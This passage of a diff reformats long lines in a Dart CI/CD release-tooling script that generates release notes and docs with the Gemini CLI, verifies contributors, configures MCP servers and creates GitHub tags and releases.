pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); final currentParts = currentVersion.split('.'); final newParts = newVersion.split('.'); String bumpType = 'minor'; @@ -825,23 +780,17 @@ Future _runReleaseNotes(String repoRoot) async { final releaseNotesDir = Directory('$repoRoot/$kReleaseNotesDir/v$newVersion'); releaseNotesDir.createSync(recursive: true); final verifiedContributors = _gatherVerifiedContributors(repoRoot, prevTag); - File('${releaseNotesDir.path}/contributors.json').writeAsStringSync( - const JsonEncoder.withIndent(' ').convert(verifiedContributors), - ); - _info( - 'Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}', - ); + File( + '${releaseNotesDir.path}/contributors.json', + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(verifiedContributors)); + _info('Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}'); // ── Load issue manifest for verified issue data ── List verifiedIssues = []; - for (final path in [ - '/tmp/issue_manifest.json', - '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json', - ]) { + for (final path in ['/tmp/issue_manifest.json', '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json']) { if (File(path).existsSync()) { try { - final manifest = - json.decode(File(path).readAsStringSync()) as Map; + final manifest = json.decode(File(path).readAsStringSync()) as Map; verifiedIssues = (manifest['github_issues'] as List?) ?? []; } catch (_) {} break; @@ -856,10 +805,7 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync( - 'dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', - repoRoot, - ); + final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -867,9 +813,7 @@ Future _runReleaseNotes(String repoRoot) async { ctx.savePrompt('release-notes', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)'); return; } @@ -877,11 +821,7 @@ Future _runReleaseNotes(String repoRoot) async { // Build @ includes -- give Gemini all available context final includes = []; - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -923,8 +863,7 @@ Future _runReleaseNotes(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI failed for release notes: ${result.stderr}'); // Create fallback - final fallback = - '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); ctx.finalize(exitCode: result.exitCode); return; @@ -961,9 +900,7 @@ Future _runReleaseNotes(String repoRoot) async { content, verifiedContributors: verifiedContributors, verifiedIssues: verifiedIssues, - repoSlug: - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}', + repoSlug: Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}', repoRoot: repoRoot, ); _success('Post-processed release notes: ${content.length} chars'); @@ -983,9 +920,7 @@ Future _runReleaseNotes(String repoRoot) async { if (migrationFile.existsSync()) { _success('Migration guide: ${migrationFile.lengthSync()} bytes'); - File( - '/tmp/migration_guide.md', - ).writeAsStringSync(migrationFile.readAsStringSync()); + File('/tmp/migration_guide.md').writeAsStringSync(migrationFile.readAsStringSync()); } else if (bumpType == 'major') { _warn('Major release but no migration guide generated'); } @@ -999,18 +934,10 @@ Future _runReleaseNotes(String repoRoot) async { } // Build rich step summary - final rnContent = releaseNotesFile.existsSync() - ? releaseNotesFile.readAsStringSync() - : '(not generated)'; - final migContent = migrationFile.existsSync() - ? migrationFile.readAsStringSync() - : ''; - final linkedContent = linkedIssuesFile.existsSync() - ? linkedIssuesFile.readAsStringSync() - : ''; - final hlContent = highlightsFile.existsSync() - ? highlightsFile.readAsStringSync() - : ''; + final rnContent = releaseNotesFile.existsSync() ? releaseNotesFile.readAsStringSync() : '(not generated)'; + final migContent = migrationFile.existsSync() ? migrationFile.readAsStringSync() : ''; + final linkedContent = linkedIssuesFile.existsSync() ? linkedIssuesFile.readAsStringSync() : ''; + final hlContent = highlightsFile.existsSync() ? highlightsFile.readAsStringSync() : ''; _writeStepSummary(''' ## Stage 3: Release Notes Author Complete @@ -1044,13 +971,8 @@ ${_artifactLink()} /// 1. Only contributors who actually committed in THIS release are listed /// 2. GitHub usernames are verified (not guessed from display names) /// 3. Bots are excluded -List> _gatherVerifiedContributors( - String repoRoot, - String prevTag, -) { - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; +List> _gatherVerifiedContributors(String repoRoot, String prevTag) { + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ @@ -1063,10 +985,7 @@ List> _gatherVerifiedContributors( return []; } - final lines = (gitResult.stdout as String) - .trim() - .split('\n') - .where((l) => l.isNotEmpty); + final lines = (gitResult.stdout as String).trim().split('\n').where((l) => l.isNotEmpty); final contributors = >[]; final seenLogins = {}; @@ -1077,9 +996,7 @@ List> _gatherVerifiedContributors( final email = parts[1]; // Skip bot emails - if (email.contains('[bot]') || - email.contains('noreply.github.com') && email.contains('bot')) - continue; + if (email.contains('[bot]') || email.contains('noreply.github.com') && email.contains('bot')) continue; // Step 2: Resolve SHA to verified GitHub login via commits API try { @@ -1092,9 +1009,7 @@ List> _gatherVerifiedContributors( if (ghResult.exitCode == 0) { final login = (ghResult.stdout as String).trim(); - if (login.isNotEmpty && - !login.contains('[bot]') && - !seenLogins.contains(login)) { + if (login.isNotEmpty && !login.contains('[bot]') && !seenLogins.contains(login)) { seenLogins.add(login); contributors.add({'username': login}); } @@ -1105,9 +1020,7 @@ List> _gatherVerifiedContributors( } if (contributors.isEmpty) { - _warn( - 'No contributors resolved from GitHub API, falling back to git names', - ); + _warn('No contributors resolved from GitHub API, falling back to git names'); // Fallback: use git display names without usernames final names = (gitResult.stdout as String) .trim() @@ -1115,9 +1028,7 @@ List> _gatherVerifiedContributors( .where((l) => l.isNotEmpty && !l.contains('[bot]')) .map((l) => l.split(' ').length > 1 ? l.split(' ')[1] : l) .toSet() - .map>( - (email) => {'username': email.split('@').first}, - ) + .map>((email) => {'username': email.split('@').first}) .toList(); return names; } @@ -1145,9 +1056,7 @@ String _postProcessReleaseNotes( contributorsSection.writeln('## Contributors'); contributorsSection.writeln(); if (verifiedContributors.isNotEmpty) { - contributorsSection.writeln( - 'Thanks to everyone who contributed to this release:', - ); + contributorsSection.writeln('Thanks to everyone who contributed to this release:'); for (final c in verifiedContributors) { final username = c['username'] ?? ''; if (username.isNotEmpty) { @@ -1188,25 +1097,16 @@ String _postProcessReleaseNotes( // ── Validate issue references throughout the document ── // Find all (#N) patterns and validate they exist - final issueRefs = RegExp( - r'\(#(\d+)\)', - ).allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); + final issueRefs = RegExp(r'\(#(\d+)\)').allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); if (issueRefs.isNotEmpty) { - final validIssues = verifiedIssues - .map((i) => i['number'] as int? ?? 0) - .toSet(); + final validIssues = verifiedIssues.map((i) => i['number'] as int? ?? 0).toSet(); final fabricated = issueRefs.difference(validIssues); if (fabricated.isNotEmpty) { - _warn( - 'Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}', - ); + _warn('Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}'); for (final issueNum in fabricated) { // Remove the link but keep descriptive text: "[#N](url) — desc" → "desc" - result = result.replaceAll( - RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), - '', - ); + result = result.replaceAll(RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), ''); // Remove inline (#N) references result = result.replaceAll('(#$issueNum)', ''); } @@ -1216,11 +1116,7 @@ String _postProcessReleaseNotes( return result; } -String _buildFallbackReleaseNotes( - String repoRoot, - String version, - String prevTag, -) { +String _buildFallbackReleaseNotes(String repoRoot, String version, String prevTag) { final buf = StringBuffer(); buf.writeln('# ${config.repoName} v$version'); buf.writeln(); @@ -1296,9 +1192,7 @@ Future _runAutodoc(String repoRoot, List args) async { if (File(configPath).existsSync()) { _success('autodoc.json exists at $configPath'); } else { - _error( - 'autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json', - ); + _error('autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json'); } return; } @@ -1346,9 +1240,7 @@ Future _runAutodoc(String repoRoot, List args) async { final generateTypes = (module['generate'] as List).cast(); final libDir = libPaths.isNotEmpty ? '$repoRoot/${libPaths.first}' : ''; - _info( - ' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}', - ); + _info(' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}'); if (dryRun) { updatedModules.add(id); @@ -1390,9 +1282,7 @@ Future _runAutodoc(String repoRoot, List args) async { if (dryRun) { _info(''); - _info( - '[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged', - ); + _info('[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged'); for (final id in updatedModules) { _info(' - $id'); } @@ -1406,9 +1296,7 @@ Future _runAutodoc(String repoRoot, List args) async { // Execute in parallel batches _info(''); - _info( - 'Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...', - ); + _info('Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...'); // Simple batching: process maxConcurrent at a time for (var i = 0; i < tasks.length; i += maxConcurrent) { @@ -1417,13 +1305,9 @@ Future _runAutodoc(String repoRoot, List args) async { } // Save updated config with new hashes - File( - configPath, - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); + File(configPath).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); - _success( - 'Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.', - ); + _success('Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.'); _info('Updated hashes saved to $kRuntimeCiDir/autodoc.json'); _writeStepSummary(''' @@ -1472,13 +1356,9 @@ Future _generateAutodocFile({ // Generate prompt from template final promptArgs = [moduleName, sourceDir]; if (libDir.isNotEmpty) promptArgs.add(libDir); - if (docType == 'migration' && previousHash.isNotEmpty) - promptArgs.add(previousHash); + if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); - final prompt = _runSync( - 'dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', - repoRoot, - ); + final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1519,10 +1399,7 @@ Do not skip any -- completeness is more important than brevity. final pass1Result = Process.runSync( 'sh', - [ - '-c', - 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', - ], + ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1530,9 +1407,7 @@ Do not skip any -- completeness is more important than brevity. if (pass1Prompt.existsSync()) pass1Prompt.deleteSync(); if (pass1Result.exitCode != 0) { - _warn( - ' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}', - ); + _warn(' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}'); return; } @@ -1613,10 +1488,7 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - [ - '-c', - 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', - ], + ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1624,9 +1496,7 @@ Write the corrected file to the same path: $absOutputFile if (pass2Prompt.existsSync()) pass2Prompt.deleteSync(); if (pass2Result.exitCode != 0) { - _warn( - ' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}', - ); + _warn(' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}'); } // Verify final output @@ -1634,9 +1504,7 @@ Write the corrected file to the same path: $absOutputFile final finalSize = outputFile.lengthSync(); final delta = finalSize - pass1Size; final deltaStr = delta >= 0 ? '+$delta' : '$delta'; - _success( - ' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)', - ); + _success(' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)'); return; } @@ -1682,9 +1550,7 @@ Future _runTriageCli(String repoRoot, List triageArgs) async { if (_dryRun) forwardedArgs.add('--dry-run'); if (_verbose) forwardedArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -1731,27 +1597,20 @@ Future _runVersion(String repoRoot) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); _info('Current version (pubspec.yaml): $currentVersion'); _info('Previous tag: $prevTag'); _info('Next version: $newVersion'); // Save version bump rationale if Gemini produced one - final rationaleFile = File( - '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', - ); + final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); if (rationaleFile.existsSync()) { final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; rationaleFile.copySync(targetPath); - _success( - 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } } @@ -1764,8 +1623,7 @@ Future _runConfigureMcp(String repoRoot) async { Map settings; try { - settings = - json.decode(settingsFile.readAsStringSync()) as Map; + settings = json.decode(settingsFile.readAsStringSync()) as Map; } catch (e) { _error('Could not read .gemini/settings.json: $e'); exit(1); @@ -1776,22 +1634,13 @@ Future _runConfigureMcp(String repoRoot) async { // GitHub MCP Server final ghToken = - Platform.environment['GH_TOKEN'] ?? - Platform.environment['GITHUB_TOKEN'] ?? - Platform.environment['GITHUB_PAT']; + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN'] ?? Platform.environment['GITHUB_PAT']; if (ghToken != null && ghToken.isNotEmpty) { _info('Configuring GitHub MCP server...'); mcpServers['github'] = { 'command': 'docker', - 'args': [ - 'run', - '-i', - '--rm', - '-e', - 'GITHUB_PERSONAL_ACCESS_TOKEN', - 'ghcr.io/github/github-mcp-server', - ], + 'args': ['run', '-i', '--rm', '-e', 'GITHUB_PERSONAL_ACCESS_TOKEN', 'ghcr.io/github/github-mcp-server'], 'env': {'GITHUB_PERSONAL_ACCESS_TOKEN': ghToken}, 'includeTools': [ 'get_issue', @@ -1822,18 +1671,14 @@ Future _runConfigureMcp(String repoRoot) async { }; _success('GitHub MCP server configured'); } else { - _warn( - 'No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.', - ); + _warn('No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.'); _info(' export GH_TOKEN='); } // Sentry MCP Server (remote, no local install needed) _info('Configuring Sentry MCP server (remote)...'); mcpServers['sentry'] = {'url': 'https://mcp.sentry.dev/mcp'}; - _success( - 'Sentry MCP server configured (uses OAuth -- browser auth on first use)', - ); + _success('Sentry MCP server configured (uses OAuth -- browser auth on first use)'); // Write updated settings settings['mcpServers'] = mcpServers; @@ -1844,9 +1689,7 @@ Future _runConfigureMcp(String repoRoot) async { return; } - settingsFile.writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(settings)}\n', - ); + settingsFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(settings)}\n'); _success('Updated .gemini/settings.json with MCP servers'); _info(''); @@ -1875,10 +1718,7 @@ Future _runStatus(String repoRoot) async { _info('Required tools:'); for (final tool in [...kRequiredTools, ...kOptionalTools]) { if (_commandExists(tool)) { - final version = _runSync( - '$tool --version 2>/dev/null || echo "installed"', - repoRoot, - ); + final version = _runSync('$tool --version 2>/dev/null || echo "installed"', repoRoot); _success(' $tool: $version'); } else { _error(' $tool: NOT INSTALLED'); @@ -1889,29 +1729,22 @@ Future _runStatus(String repoRoot) async { _info(''); _info('Environment:'); final geminiKey = Platform.environment['GEMINI_API_KEY']; - _info( - ' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}', - ); - final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + _info(' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}'); + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; _info(' GitHub token: ${ghToken != null ? "set" : "NOT SET"}'); // Check MCP servers _info(''); _info('MCP servers:'); try { - final settings = json.decode( - File('$repoRoot/.gemini/settings.json').readAsStringSync(), - ); + final settings = json.decode(File('$repoRoot/.gemini/settings.json').readAsStringSync()); final mcpServers = settings['mcpServers'] as Map?; if (mcpServers != null && mcpServers.isNotEmpty) { for (final server in mcpServers.keys) { _success(' $server: configured'); } } else { - _info( - ' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp', - ); + _info(' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp'); } } catch (_) { _info(' Could not read MCP configuration'); @@ -1931,10 +1764,7 @@ Future _runStatus(String repoRoot) async { // Show version info _info(''); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); final prevTag = _detectPrevTag(repoRoot); _info('Package version: $currentVersion'); _info('Latest tag: $prevTag'); @@ -1955,20 +1785,14 @@ Future _runDetermineVersion(String repoRoot, List args) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); // Determine if we should release var shouldRelease = newVersion != currentVersion; // Safety net: if the tag already exists, skip release regardless if (shouldRelease) { - final tagCheck = Process.runSync('git', [ - 'rev-parse', - 'v$newVersion', - ], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', ['rev-parse', 'v$newVersion'], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _warn('Tag v$newVersion already exists. Skipping release.'); shouldRelease = false; @@ -1982,28 +1806,18 @@ Future _runDetermineVersion(String repoRoot, List args) async { // Save version bump rationale if Gemini produced one if (shouldRelease) { - final rationaleFile = File( - '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', - ); + final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; if (rationaleFile.existsSync()) { rationaleFile.copySync(targetPath); - _success( - 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } else { // Generate basic rationale - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); - final commits = _runSync( - 'git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', - repoRoot, - ); + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -2011,9 +1825,7 @@ Future _runDetermineVersion(String repoRoot, List args) async { '**Commits**: $commitCount\n\n' '## Commits\n\n$commits\n', ); - _success( - 'Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md'); } } @@ -2056,9 +1868,7 @@ Future _runDetermineVersion(String repoRoot, List args) async { } // Read version bump rationale for summary - final rationaleContent = _readFileOr( - '$repoRoot/$kVersionBumpsDir/v$newVersion.md', - ); + final rationaleContent = _readFileOr('$repoRoot/$kVersionBumpsDir/v$newVersion.md'); _writeStepSummary(''' ## Version Determination @@ -2117,10 +1927,7 @@ Future _runCreateRelease(String repoRoot, List args) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); final pubspecContent = pubspecFile.readAsStringSync(); pubspecFile.writeAsStringSync( - pubspecContent.replaceFirst( - RegExp(r'^version: .*', multiLine: true), - 'version: $newVersion', - ), + pubspecContent.replaceFirst(RegExp(r'^version: .*', multiLine: true), 'version: $newVersion'), ); _info('Bumped pubspec.yaml to version $newVersion'); @@ -2147,14 +1954,13 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - if (foundReleaseNotes != null && - foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { + if (foundReleaseNotes != null && foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { foundReleaseNotes.copySync('${releaseDir.path}/release_notes.md'); _info('Copied release notes to ${releaseDir.path}/release_notes.md'); } else if (foundReleaseNotes == null) { - File('${releaseDir.path}/release_notes.md').writeAsStringSync( - _buildFallbackReleaseNotes(repoRoot, newVersion, prevTag), - ); + File( + '${releaseDir.path}/release_notes.md', + ).writeAsStringSync(_buildFallbackReleaseNotes(repoRoot, newVersion, prevTag)); _warn('No Stage 3 release notes found -- generated fallback'); } @@ -2178,9 +1984,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Copy Stage 3 linked issues if it exists, otherwise create minimal final existingLinked = File('${releaseDir.path}/linked_issues.json'); if (!existingLinked.existsSync()) { - File('${releaseDir.path}/linked_issues.json').writeAsStringSync( - '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}', - ); + File( + '${releaseDir.path}/linked_issues.json', + ).writeAsStringSync('{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}'); } // Copy Stage 3 highlights if it exists @@ -2193,10 +1999,7 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelog = File('$repoRoot/CHANGELOG.md'); if (changelog.existsSync()) { final content = changelog.readAsStringSync(); - final entryMatch = RegExp( - '## \\[$newVersion\\].*?(?=## \\[|\\Z)', - dotAll: true, - ).firstMatch(content); + final entryMatch = RegExp('## \\[$newVersion\\].*?(?=## \\[|\\Z)', dotAll: true).firstMatch(content); File( '${releaseDir.path}/changelog_entry.md', ).writeAsStringSync(entryMatch?.group(0)?.trim() ?? '## [$newVersion]\n'); @@ -2204,9 +2007,7 @@ Future _runCreateRelease(String repoRoot, List args) async { // Contributors: use the single verified source of truth final contribs = _gatherVerifiedContributors(repoRoot, prevTag); - File( - '${releaseDir.path}/contributors.json', - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); + File('${releaseDir.path}/contributors.json').writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); _success('Release notes assembled in $kReleaseNotesDir/v$newVersion/'); @@ -2218,11 +2019,7 @@ Future _runCreateRelease(String repoRoot, List args) async { // Step 4: Commit all changes _info('Configuring git identity for release commit'); _exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot); - _exec('git', [ - 'config', - 'user.email', - 'github-actions[bot]@users.noreply.github.com', - ], cwd: repoRoot); + _exec('git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot); // Add files individually — git add is all-or-nothing and will fail the // entire command if any path doesn't exist (e.g., autodoc.json on first @@ -2237,8 +2034,7 @@ Future _runCreateRelease(String repoRoot, List args) async { '$kRuntimeCiDir/autodoc.json', ]; if (Directory('$repoRoot/docs').existsSync()) filesToAdd.add('docs/'); - if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) - filesToAdd.add('$kCicdAuditDir/'); + if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) filesToAdd.add('$kCicdAuditDir/'); _info('Staging ${filesToAdd.length} release artifacts for commit'); for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; @@ -2247,11 +2043,7 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - final diffResult = Process.runSync('git', [ - 'diff', - '--cached', - '--quiet', - ], workingDirectory: repoRoot); + final diffResult = Process.runSync('git', ['diff', '--cached', '--quiet'], workingDirectory: repoRoot); if (diffResult.exitCode != 0) { // Build a rich, detailed commit message from available artifacts final commitMsg = _buildReleaseCommitMessage( @@ -2263,20 +2055,12 @@ Future _runCreateRelease(String repoRoot, List args) async { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - _exec( - 'git', - ['commit', '-F', commitMsgFile.path], - cwd: repoRoot, - fatal: true, - ); + _exec('git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, fatal: true); commitMsgFile.deleteSync(); // Use GH_TOKEN for push authentication (HTTPS remote) - final ghToken = - Platform.environment['GH_TOKEN'] ?? - Platform.environment['GITHUB_TOKEN']; - final remoteRepo = - Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { _exec('git', [ 'remote', @@ -2292,20 +2076,12 @@ Future _runCreateRelease(String repoRoot, List args) async { } // Step 5: Create git tag (verify it doesn't already exist) - final tagCheck = Process.runSync('git', [ - 'rev-parse', - tag, - ], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', ['rev-parse', tag], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _error('Tag $tag already exists. Cannot create release.'); exit(1); } - _exec( - 'git', - ['tag', '-a', tag, '-m', 'Release v$newVersion'], - cwd: repoRoot, - fatal: true, - ); + _exec('git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true); _exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true); _success('Created tag: $tag'); @@ -2322,23 +2098,14 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelogLink = File('$repoRoot/CHANGELOG.md').existsSync() ? ' | [CHANGELOG.md](https://github.com/$effectiveRepo/blob/v$newVersion/CHANGELOG.md)' : ''; - final migrationLink = - File('${releaseDir.path}/migration_guide.md').existsSync() + final migrationLink = File('${releaseDir.path}/migration_guide.md').existsSync() ? ' | [Migration Guide]($kReleaseNotesDir/v$newVersion/migration_guide.md)' : ''; releaseBody += '\n\n---\n[Full Changelog](https://github.com/$effectiveRepo/compare/$prevTag...v$newVersion)' '$changelogLink$migrationLink'; - final ghArgs = [ - 'release', - 'create', - tag, - '--title', - 'v$newVersion', - '--notes', - releaseBody, - ]; + final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); _exec('gh', ghArgs, cwd: repoRoot); @@ -2392,15 +2159,12 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary( - '## Test Results\n\n**No test/ directory found — skipped.**\n', - ); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); return; } // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = - Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); final jsonPath = '$logDir/results.json'; @@ -2425,11 +2189,7 @@ Future _runTest(String repoRoot) async { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. - final process = await Process.start( - Platform.resolvedExecutable, - testArgs, - workingDirectory: repoRoot, - ); + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -2450,18 +2210,13 @@ Future _runTest(String repoRoot) async { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - _error( - 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([ - stdoutDone, - stderrDone, - 